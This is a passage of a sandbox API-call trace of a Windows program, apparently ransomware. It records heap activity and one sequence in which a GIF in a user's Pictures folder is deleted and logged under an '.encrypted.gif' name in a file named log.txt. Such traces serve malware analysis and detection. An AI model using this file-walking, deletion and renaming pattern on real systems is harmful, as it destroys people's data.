dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.748] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.748] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.749] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.749] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.749] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.749] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFilePart=0x0) returned 0x6e [0039.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0x17663400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0x7c2100 [0039.749] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\77o ybs-vwsh8x3oiij.gif")) returned 1 [0039.751] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0x17663400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0 [0039.751] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.751] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.752] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.753] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.753] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2a3e, lpOverlapped=0x0) returned 1 [0039.753] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2a3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.753] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.encrypted.gif\r\n", cchWideChar=123, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 123 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7b) returned 0x7d5b30 [0039.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.encrypted.gif\r\n", cchWideChar=123, lpMultiByteStr=0x7d5b30, cbMultiByte=123, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 123 [0039.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0039.754] WriteFile (in: hFile=0x140, lpBuffer=0x7d5bb8*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5bb8*, lpNumberOfBytesWritten=0x6aee3c*=0x7a, lpOverlapped=0x0) returned 1 [0039.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0039.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.754] CloseHandle (hObject=0x140) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.755] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.755] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.756] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.756] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.756] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.757] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.757] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.759] RtlAllocateHeap (HeapHandle=0x770000, 